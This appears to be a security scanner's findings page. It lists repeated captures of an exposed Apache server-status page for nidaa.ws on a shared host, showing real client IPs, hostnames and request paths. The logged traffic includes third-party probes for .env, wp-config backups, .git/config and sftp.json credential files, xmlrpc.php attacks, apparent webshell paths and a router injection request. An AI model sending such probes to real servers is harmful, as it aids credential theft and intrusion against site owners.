      4.178.106.56http/1.1garndhabi.org:443GET /tz.php HTTP/1.1
      
      1-564140/58/2487_
      2.464014088280.01.04209.26
      4.178.106.56http/1.1garndhabi.org:443GET /wp-config.php.bak HTTP/1.1
      
      1-564140/10/2433_
      2.424313056930.00.48313.69
      4.178.106.5
      Found on 2024-06-18 01:59
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df7369218b2

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Monday, 17-Jun-2024 00:16:57 +03
      Restart Time: Tuesday, 11-Jun-2024 04:03:04 +03
      Parent Server Config. Generation: 5
      Parent Server MPM Generation: 4
      Server uptime:  5 days 20 hours 13 minutes 52 seconds
      Server load: 0.00 0.01 0.05
      Total accesses: 499068 - Total Traffic: 61.2 GB - Total Duration: 1555725135
      CPU Usage: u265.06 s16.61 cu2177.97 cs455.79 - .578% CPU load
      .989 requests/sec - 127.1 kB/second - 128.6 kB/request - 3117.26 ms/request
      9 requests currently being processed, 0 workers gracefully restarting, 166 idle workers
      _______________K_________.........................______________
      ____W_K______K_____________________________________K____________
      ____K______K_____________________________W_____.................
      ................................................................
      ................................................................
      ....._____________________K___..................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-4150130/60/2138_
      2.794472299119860.00.36233.23
      172.70.156.152http/1.1qr.brunch.ws:443GET /storage/food_image/17095843613277_scrambellbruscatta.webp 
      
      0-4150130/18/1769_
      2.8044775940570.01.58175.89
      172.70.156.155http/1.1qr.brunch.ws:443GET /storage/food_image/17096783615789_beef.webp HTTP/1.1
      
      0-4150130/13/1691_
      2.7844827124590.00.28159.68
      172.70.156.156http/1.1qr.brunch.ws:443GET /assets/js/pages/notification.init.js HTTP/1.1
      
      0-4150130/10/1821_
      2.765178043131370.06.24163.64
      66.249.66.83http/1.1albayan.edu.sa:443GET /imgweb/file42/Writing%20WB%20%205%20T2-2021.pdf HTTP/1.1
      
      0-4150130/25/1993_
      2.7745404981150.01.01308.60
      40.77.167.48http/1.1albayan.edu.sa:80GET /web/119.html2 HTTP/1.1
      
      0-4150130/61/1732_
      2.7650822609290.00.17194.36
      138.201.201.48http/1.1sulaimaniya.edu.sa:443POST /wp-cron.php?doing_wp_cron=1718572108.94512891769409179687
      
      0-4150130/16/1974_
      2.4660743611470.00.69135.63
      207.154.212.47http/1.1
      
      0-4150130/59/2080_
      2.8044733354510.00.28193.33
      172.70.156.159http/1.1qr.brunch.ws:443GET /storage/food_image/17088473288673_img3a0124b801a84169b7c46
      
      0-4150130/9/1683_
      2.72604172821590.00.04110.57
      207.154.212.47http/1.1akg.sa:443GET /.env HTTP/1.1
      
      0-4150130/62/1821_
      2.81447613040000.03.13434.91
      172.70.156.150http/1.1qr.brunch.ws:443GET /storage/food_image/17085196668732_imgd5955e49a1e64fdf9ea4f
      
      0-4150130/11/1929_
      2.84416204798640.04.82243.48
      127.0.0.1http/1.1php.we3dvi.com:80GET /whm-server-status HTTP/1.0
      
      0-4150130/16/1808_
      2.862621873861060.03.14265.34
      40.77.167.48http/1.1albayan.edu.sa:443GET /imgweb/tahood.pdf HTTP/1.1
      
      0-4150130/11/1807_
      2.72606388228030.012.09105.34
      138.201.201.48http/1.1zed.sa:443POST /wp-cron.php?doing_wp_cron=1718572011.71415209770202636718
      
      0-4150130/10/1746_
      2.853486633989660.00.68148.69
      103.175.220.129http/1.1zed.sa:443POST /xmlrpc.php HTTP/1.1
      
      0-4150130/10/2085_
      2.862451208137460.00.74450.40
      162.240.156.237http/1.1trydaris.com:443POST /xmlrpc.php HTTP/1.1
      
      0-4150131/25/1987K
      2.91113306210.718.79208.85
      172.71.154.246http/1.1nidaa.ws:80GET /.vscode/sftp.json HTTP/1.1
      
      0-4150130/18/1818_
      2.8962242338610.00.53178.22
      66.249.66.74http/1.1jilani.com.sa:80GET /en HTTP/1.1
      
      0-4150130/15/1833_
      2.882104665584750.01.48254.72
      52.167.144.19http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/HP36.jpg HTTP/1.1
      
      0-4150130/8/1932_
      2.88191134026850.01.21168.07
      85.208.96.201http/1.1albayan.edu.sa:443GET /albayan_library/Books.php?sec=1181 HTTP/1.1
      
      0-4150130/10/1511_
      2.7750113705090.00.05250.99
      46.101.1.225http/1.1abu-helal.com:80GET /login.action HTTP/1.1
      
      0-4150130/12/1798_
      2.4760722843298240.04.62234.74
      207.154.212.47http/1.1
      
      0-4150130/13/1900_
      2.72607325697090.08.20136.77
      207.154.212.47http/1.1akg.sa:443GET /debug/default/view?panel=config HTTP/1.1
      
      0-4150130/15/1824_
      2.7750112641900.06.88178.50
      46.101.1.225http/1.1abu-helal.com:80GET /telescope/requests HTTP/1.1
      
      0-4150130/14/1765_
      2.9013437881410.04.51332.64
      172.70.203.130http/1.1qr.brunch.ws:443GET /dar-zed HTTP/1.1
      
      0-4150130/14/1873_
      2.7750118552920.00.11159.39
      46.101.1.225http/1.1abu-helal.com:80GET /server HTTP/1.1
      
      1-4-0/0/2155.
      0.0076895631331500.00.00329.66
      141.101.97.24http/1.1qr.brunch.ws:443GET /storage/category_image/17098161049298_8.png HTTP/1.1
      
      1-4-0/0/1842.
      0.0076845499970.00.00177.96
      172.69.222.81http/1.1qr.brunch.ws:443GET /storage/food_image/17096787054793_carrotorange.webp HTTP/1
      
      1-4-0/0/2012.
      0.0076870625318380.00.00211.54
      172.69.222.245http/1.1qr.brunch.ws:443GET /storage/food_image/17088535367542_imgd0268fa62d0c437fad637
      
      1-4-0/0/1817.
      0.0076823671850.00.00105.33
      141.101.95.9http/1.1qr.brunch.ws:443GET /storage/category_image/17098165745683_17.png HTTP/1.1
      
      1-4-0/0/1900.
      0.0076815676290.00.00118.73
      172.69.223.21http/1.1qr.brunch.ws:443GET /assets/libs/alertifyjs/build/css/themes/default.min.css HT
      
      1-4-0/0/1841.
      0.0076874057990.00.00184.64
      172.69.223.46http/1.1qr.brunch.ws:443GET /storage/food_image/17096772331378_chickenburger.webp HTTP/
      
      1-4-0/0/2285.
      0.00768975962570.00.00253.05
      172.69.222.12http/1.1qr.brunch.ws:443GET /storage/food_image/17085193875726_imgbda3904cb18f45a587921
      
      1-4-0/0/1828.
      0.0076823798810.00.00190.66
      172
      Found on 2024-06-16 21:16
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df7556d9761

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Sunday, 16-Jun-2024 12:46:32 +03
      Restart Time: Tuesday, 11-Jun-2024 04:03:04 +03
      Parent Server Config. Generation: 5
      Parent Server MPM Generation: 4
      Server uptime:  5 days 8 hours 43 minutes 27 seconds
      Server load: 0.00 0.02 0.05
      Total accesses: 453728 - Total Traffic: 56.5 GB - Total Duration: 1510475583
      CPU Usage: u254.08 s15.79 cu1980.51 cs418.28 - .576% CPU load
      .979 requests/sec - 127.9 kB/second - 130.6 kB/request - 3329.03 ms/request
      8 requests currently being processed, 0 workers gracefully restarting, 167 idle workers
      __K______________________K__________________________K_________K_
      _____________________________K____________________________W_____
      __________K___________........................._________________
      _K______........................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-4218790/110/1940_
      2.309152298987650.00.10214.75
      94.23.207.193http/1.1jawad.com.sa:80GET /en/variable-product-page.php?a=3&i_p=981 HTTP/1.1
      
      0-4218790/14/1525_
      2.714415226980.00.30160.26
      216.244.66.242http/1.1jawad.com.sa:80GET /robots.txt HTTP/1.1
      
      0-4218791/11/1566K
      2.71116740140.80.11140.13
      172.70.114.222http/1.1nidaa.ws:80GET /server HTTP/1.1
      
      0-4218790/16/1590_
      2.31891782983950.01.59147.25
      40.77.167.27http/1.1daris.live:443GET /sitemaps.xml HTTP/1.1
      
      0-4218790/14/1778_
      2.33846394875950.00.09297.05
      5.109.211.108http/1.1jawad.com.sa:443POST /api/v.1/front/category/list HTTP/1.1
      
      0-4218790/59/1514_
      1.9189502484710.00.13167.37
      162.243.160.28http/1.1
      
      0-4218790/64/1732_
      2.366961373518090.00.13130.38
      172.70.179.136http/1.1support.daaris.com:443GET /serverstatus.php?language=english HTTP/1.1
      
      0-4218790/66/1795_
      2.3482813137570.00.10189.12
      216.218.206.67http/1.13dvi.com:443GET /favicon.ico HTTP/1.1
      
      0-4218790/62/1538_
      2.35744572750870.00.1299.34
      216.218.206.67http/1.13dvi.com:443GET / HTTP/1.1
      
      0-4218790/10/1557_
      2.396798212899860.00.20400.88
      176.109.189.160http/1.1trydaris.com:443POST //xmlrpc.php HTTP/1.1
      
      0-4218790/12/1636_
      2.32868614236970.00.27227.65
      40.77.188.164http/1.13dvi.com:443GET /api/feature/get HTTP/1.1
      
      0-4218790/10/1515_
      2.426141023693580.00.22236.92
      66.249.66.161http/1.1daris.live:443GET /assets/default/404/css/bootstrap.css HTTP/1.1
      
      0-4218790/11/1603_
      2.4066215487732570.00.6186.70
      103.172.113.21http/1.1united.thenewjeddah.com:443POST /api/admin/general/me HTTP/1.1
      
      0-4218790/15/1544_
      2.42640813889160.00.48141.77
      40.77.167.1http/1.13dvi.com:443GET /sitemap.xml HTTP/1.1
      
      0-4218790/62/1767_
      2.5820417980000.00.18441.20
      13.79.92.212http/1.1thenewjeddah.com:443GET /css/xmrlpc.php?p= HTTP/1.1
      
      0-4218790/8/1635_
      2.44458143119700.00.99180.02
      52.167.144.238http/1.1albayan.edu.sa:443GET /albayan_library/Books.php?sec=16 HTTP/1.1
      
      0-4218790/11/1673_
      2.338515192226550.00.19158.95
      5.109.211.108http/1.1jawad.com.sa:443GET /public/front_resources/fonts/fontawesome-webfont.ttf?v=4.7
      
      0-4218790/10/1599_
      2.38681873145890.00.08213.35
      176.109.189.160http/1.1trydaris.com:443POST //xmlrpc.php HTTP/1.1
      
      0-4218790/14/1541_
      2.41668963303470.07.05159.72
      176.109.189.160http/1.1trydaris.com:443POST //xmlrpc.php HTTP/1.1
      
      0-4218790/9/1382_
      2.4359913593960.00.10240.59
      223.72.82.4http/1.1albayan.edu.sa:443GET /robots.txt HTTP/1.1
      
      0-4218790/14/1581_
      2.711480843119060.00.17116.24
      66.249.66.82http/1.1albayan.edu.sa:80GET /web/316.html2 HTTP/1.1
      
      0-4218790/13/1558_
      2.3668215601520.00.07123.67
      43.163.6.35http/1.1thenewjeddah.com:443GET / HTTP/1.1
      
      0-4218790/60/1542_
      2.7018712498930.00.13166.51
      13.79.92.212http/1.1thenewjeddah.com:443GET /wp-includes/js/tinymce/skins/wordpress/images/index.php HT
      
      0-4218790/9/1539_
      2.396701317187340.00.08317.62
      176.109.189.160http/1.1trydaris.com:443POST //xmlrpc.php HTTP/1.1
      
      0-4218790/9/1614_
      2.4535518462700.00.12155.78
      13.59.187.201http/1.1garndhabi.org:80GET /assets/plugins/jquery-block-ui/jqueryblockui.min.js HTTP/1
      
      1-4219071/62/1856K
      2.3611631167580.70.65318.26
      172.70.111.142http/1.1nidaa.ws:80GET /.vscode/sftp.json HTTP/1.1
      
      1-4219070/10/1615_
      2.3642103595400.00.19165.49
      216.244.66.242http/1.1jawad.com.sa:443GET /robots.txt HTTP/1.1
      
      1-4219070/60/1767_
      2.108960625137180.01.00166.88
      162.243.160.28http/1.1alezdhar.com:80GET / HTTP/1.1
      
      1-4219070/12/1444_
      2.14699593501260.00.0975.76
      43.231.233.163http/1.13dvi.com:443GET /chosen.php?p= HTTP/1.1
      
      1-4219070/8/1793_
      1.6989585596460.00.12115.16
      162.243.160.28http/1.1
      
      1-4219070/60/1649_
      2.11868413964310.00.11175.00
      40.77.189.242http/1.13dvi.com:443GET /api/slide/get HTTP/1.1
      
      1-4219070/59/1976_
      2.166811033696320.00.10247.36
      176.109.189.160http/1.1trydaris.com:443POST //xmlrpc.php HTTP/1.1
      
      1-4219070/15/1619_
      2.156831133692540.00.88187.62
      176.109.189.160http/1.1trydaris.com:80GET / HTTP/1.1
      
      1-4219070/15/1909_
      2.1384836433517510.04.73130.57
      5.109.211.108http/1.1jawad.com.sa:443</
      Found on 2024-06-16 09:46
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df736709644

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Wednesday, 12-Jun-2024 23:12:16 +03
      Restart Time: Tuesday, 11-Jun-2024 04:03:04 +03
      Parent Server Config. Generation: 3
      Parent Server MPM Generation: 2
      Server uptime:  1 day 19 hours 9 minutes 12 seconds
      Server load: 0.41 0.44 0.42
      Total accesses: 169716 - Total Traffic: 18.5 GB - Total Duration: 186540952
      CPU Usage: u158.15 s16.96 cu647.1 cs127.86 - .612% CPU load
      1.09 requests/sec - 125.1 kB/second - 114.5 kB/request - 1099.14 ms/request
      12 requests currently being processed, 0 workers gracefully restarting, 238 idle workers
      __________________K_________________________K_____K____W________
      __________________________K_____________________________K_______
      _____K_____________________________W___R________________________
      _______K........................._____________K_________________
      _______________K___.............................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-2296720/135/744_
      15.202318246297223520.012.4473.69
      47.128.30.222http/1.1albayan.edu.sa:443GET /e_sch/js/jquery-1.6.1.min.js HTTP/1.1
      
      0-2296720/137/656_
      15.2118721726200.018.2491.35
      31.167.148.118http/1.1albayan.edu.sa:443GET /e_sch/font/css/bootstrap.min.css HTTP/1.1
      
      0-2296720/125/629_
      15.0127455811310.03.1737.60
      138.68.86.32http/1.1
      
      0-2296720/139/741_
      15.0127421298900.01.9887.01
      139.162.141.82http/1.1
      
      0-2296720/69/655_
      15.18321101545290.02.5491.64
      27.125.250.239http/1.13dvi.com:443GET /v/tasbeeh/ HTTP/1.1
      
      0-2296720/97/560_
      15.1082540764560.04.8886.42
      2.90.199.127http/1.1garndhabi.org:80GET /api/v1/auth/user HTTP/1.1
      
      0-2296720/117/775_
      15.09838351364940.02.0361.87
      2.90.199.101http/1.1garndhabi.org:80GET /login HTTP/1.1
      
      0-2296720/139/680_
      15.174820857790.02.4333.66
      127.0.0.1http/1.1php.we3dvi.com:80GET / HTTP/1.0
      
      0-2296720/110/650_
      14.9576721149160.09.4430.68
      174.138.7.144http/1.1
      
      0-2296720/120/675_
      15.231002854100.0116.71211.47
      104.28.106.196http/1.13dvi.com:443GET /stamp/logo3d.png HTTP/1.1
      
      0-2296720/68/640_
      15.1927212390850.015.8796.55
      139.162.141.82http/1.1tasbeeh.thenewjeddah.com:443GET /.git/config HTTP/1.1
      
      0-2296720/119/642_
      15.175166831896470.05.9577.25
      192.42.116.195http/1.1zed.sa:80POST /xmlrpc.php HTTP/1.1
      
      0-2296720/95/562_
      15.19271186022700.04.0347.04
      138.68.86.32http/1.1dash.thenewjeddah.com:443GET /about HTTP/1.1
      
      0-2296720/78/534_
      15.22122192330600.08.6868.81
      66.249.73.131http/1.1albayan.edu.sa:443GET /albayan_library/Categorys3.php?sec=103 HTTP/1.1
      
      0-2296720/143/729_
      15.2364184241170.035.2476.29
      188.114.102.234http/1.1qr.brunch.ws:443GET /public/assets/fonts/rb.ttf HTTP/1.1
      
      0-2296720/87/630_
      15.1927012117000.02.8577.49
      138.68.86.32http/1.1dash.thenewjeddah.com:443GET /s/8343e2130323e2130323e2833313/_/;/META-INF/maven/com.atla
      
      0-2296720/118/643_
      15.1279961404170.012.72109.79
      216.244.66.198http/1.1albayan.edu.sa:443GET /albayan_library/Books.php?sec=931 HTTP/1.1
      
      0-2296720/162/656_
      14.9662611349840.03.7581.85
      31.167.148.118http/1.1
      
      0-2296721/103/599K
      15.23002393410.85.9324.64
      172.68.193.190http/1.1nidaa.ws:80GET /debug/default/view?panel=config HTTP/1.1
      
      0-2296720/100/552_
      15.1655122857380.033.43101.12
      156.197.54.9http/1.1albayan.edu.sa:443GET /e_sch/images/footer.jpg HTTP/1.1
      
      0-2296720/87/492_
      15.20254282119360.01.6765.09
      202.61.233.9http/1.1alezdhar.com:443GET /.env.example HTTP/1.1
      
      0-2296720/86/591_
      15.175307151767280.02.0748.80
      185.246.188.73http/1.1zed.sa:80POST /xmlrpc.php HTTP/1.1
      
      0-2296720/92/600_
      15.1276831211770.02.2529.69
      138.201.201.48http/1.1sulaimaniya.edu.sa:80POST /wp-cron.php?doing_wp_cron=1718222368.33321404457092285156
      
      0-2296720/151/642_
      14.95693901002930.09.88100.67
      82.167.45.76http/1.1
      
      0-2296720/79/584_
      15.0127416698900.05.7984.39
      138.68.86.32http/1.1
      
      1-2206480/13/863_
      1.6727405524200.00.52144.61
      138.68.86.32http/1.1
      
      1-2206480/14/684_
      1.83540381771540.00.53100.52
      156.197.54.9http/1.1albayan.edu.sa:443GET /web/24.html2 HTTP/1.1
      
      1-2206480/6/752_
      1.5876823179330.00.0558.06
      174.138.7.144http/1.1
      
      1-2206480/10/626_
      1.8258302524260.00.1041.47
      40.77.167.36http/1.1albayan.edu.sa:80GET /imgweb/file42/%D8%AC%D8%AF%D9%88%D9%84%20%D8%A7%D8%AE%D8%A
      
      1-2206480/8/850_
      2.1428302455810.00.1354.48
      52.167.144.217http/1.1albayan.edu.sa:80GET /albayan_library/upload/books/01_78101.pdf HTTP/1.1
      
      1-2206480/8/760_
      1.8069822804030.00.0445.98
      185.191.127.212http/1.1php.we3dvi.com:80GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&co
      
      1-2206480/6/764_
      1.6727451263420.00.14149.22
      139.162.141.82http/1.1
      
      1-2206480/7/662_
      1.6727412562210.00.13119.03
      138.68.86.32http/1.1
      
      1-2206480/8/834_
      2.1627212539200.00.1367.53
      138.68.86.32http/1.1dash.thenewjeddah.com:443GET /.DS_Store HTTP/1.1
      
      1-2206480/16/866_
      2.1626281696750.00.2274.37
      202.61.233.9http/1.1
      Found on 2024-06-12 20:12
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df71ad74160

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Wednesday, 12-Jun-2024 04:57:12 +03
      Restart Time: Tuesday, 11-Jun-2024 04:03:04 +03
      Parent Server Config. Generation: 3
      Parent Server MPM Generation: 2
      Server uptime:  1 day 54 minutes 7 seconds
      Server load: 0.62 0.46 0.42
      Total accesses: 95848 - Total Traffic: 11.0 GB - Total Duration: 148588901
      CPU Usage: u49.41 s3.56 cu400.93 cs82.77 - .599% CPU load
      1.07 requests/sec - 128.7 kB/second - 120.4 kB/request - 1550.26 ms/request
      15 requests currently being processed, 0 workers gracefully restarting, 110 idle workers
      _K____________________KK___K__________________W_KW______________
      _______KKK___________________K_K__K_............................
      ..............................................._________________
      _____KK_........................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-2230900/31/448_
      1.433222294272460.011.0054.38
      175.110.221.112http/1.1albayan.edu.sa:443GET /e_sch/images/complaints_and_suggestions.png HTTP/1.1
      
      0-2230901/8/356K
      1.7400519460.80.3961.20
      172.69.151.239http/1.1nidaa.ws:80GET /server HTTP/1.1
      
      0-2230900/9/326_
      1.313992865960.00.3526.63
      216.144.248.24http/1.1php.we3dvi.com:443HEAD / HTTP/1.1
      
      0-2230900/9/379_
      1.37355959908390.00.5176.86
      52.230.152.92http/1.1zed.sa:443GET /product/salted-caramel/?add-to-cart=3273 HTTP/1.1
      
      0-2230900/8/392_
      1.492492901175500.00.9871.70
      174.140.13.85http/1.1albayan.edu.sa:443GET /imgweb/1445/%D8%B4%D9%83%D8%B1%20%D9%88%D8%AA%D9%82%D8%AF%
      
      0-2230900/12/280_
      1.284040430260.00.9731.92
      174.140.13.85http/1.1albayan.edu.sa:80GET /web/109.html2 HTTP/1.1
      
      0-2230900/20/456_
      1.463062793000.00.4232.35
      175.110.221.112http/1.1albayan.edu.sa:443GET /e_sch/js/pe.kenburns/themes/default/img/thumb_bg.png HTTP/
      
      0-2230900/8/385_
      1.462772447300.00.2916.32
      138.201.201.48http/1.1sulaimaniya.edu.sa:443POST /wp-cron.php?doing_wp_cron=1718157155.43666791915893554687
      
      0-2230900/12/336_
      1.383280814230.00.319.51
      175.110.221.112http/1.1albayan.edu.sa:443GET /e_sch/js/pe.kenburns/jquery.pixelentity.kenburnsSlider.min
      
      0-2230900/14/300_
      1.482563901930.01.3072.23
      174.140.13.85http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      0-2230900/6/400_
      1.45305170377410.00.2562.75
      175.110.221.112http/1.1albayan.edu.sa:443GET /favicon.ico HTTP/1.1
      
      0-2230900/7/339_
      1.511869661576700.00.8459.36
      52.230.152.26http/1.1zed.sa:443GET /product/kids-meal/?add-to-cart=3258 HTTP/1.1
      
      0-2230900/8/282_
      1.52163384401800.00.4336.37
      217.55.39.103http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      0-2230900/9/318_
      1.512243837610.00.3951.82
      142.154.97.162http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      0-2230900/10/398_
      1.531486403058090.07.2931.34
      52.230.152.118http/1.1zed.sa:443GET /product/feta-cheese/feed/ HTTP/1.1
      
      0-2230900/7/337_
      1.531471681534550.00.3931.09
      142.154.97.162http/1.1albayan.edu.sa:443GET /school/albayan_images/3333.jpg HTTP/1.1
      
      0-2230900/26/310_
      1.71727602590.023.6477.37
      40.77.167.8http/1.1albayan.edu.sa:443GET /imgweb/ja65.pdf HTTP/1.1
      
      0-2230900/8/344_
      1.691311807987290.042.1268.57
      52.167.144.219http/1.1albayan.edu.sa:443GET /imgweb/book/senatalqaed.pdf HTTP/1.1
      
      0-2230900/7/317_
      1.699902112560.00.2511.29
      216.144.248.24http/1.1php.we3dvi.com:443HEAD / HTTP/1.1
      
      0-2230900/13/264_
      1.73436812099890.03.9649.67
      52.230.152.29http/1.1zed.sa:443GET /?p=3233 HTTP/1.1
      
      0-2230900/7/233_
      1.71653496220.00.2631.74
      138.201.201.48http/1.1zed.sa:443POST /menu/wp-cron.php?doing_wp_cron=1718157367.403584003448486
      
      0-2230900/13/327_
      1.7369941349890.00.3639.05
      52.230.152.29http/1.1zed.sa:443GET /product-category/cold-drinks/ HTTP/1.1
      
      0-2230901/11/239K
      1.742294960126.10.4921.23
      17.241.75.254http/1.1jawad.com.sa:443GET /public/front_resources/css/bootstrap.min.css HTTP/1.1
      
      0-2230901/17/200K
      1.7400370590.90.7876.89
      172.69.151.166http/1.1nidaa.ws:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor
      
      0-2230900/40/357_
      1.363676302354230.03.0865.37
      52.230.152.100http/1.1zed.sa:443GET /wp-content/uploads/2020/03/home1-img-42.jpg HTTP/1.1
      
      1-2230910/13/565_
      1.6340114786950.068.45112.47
      52.230.152.146http/1.1jawad.com.sa:443GET / HTTP/1.1
      
      1-2230910/8/379_
      1.653554901130530.066.2585.81
      52.230.152.92http/1.1zed.sa:443GET /wp-content/uploads/2020/03/Our-Menu.jpg HTTP/1.1
      
      1-2230911/7/475K
      1.79001240450.70.8347.56
      172.70.250.142http/1.1nidaa.ws:80GET /.vscode/sftp.json HTTP/1.1
      
      1-2230910/18/322_
      1.643983251723440.01.4918.16
      174.140.13.85http/1.1albayan.edu.sa:443GET /imgweb/1445/t2.pdf HTTP/1.1
      
      1-2230910/7/518_
      1.653281846230.00.2228.72
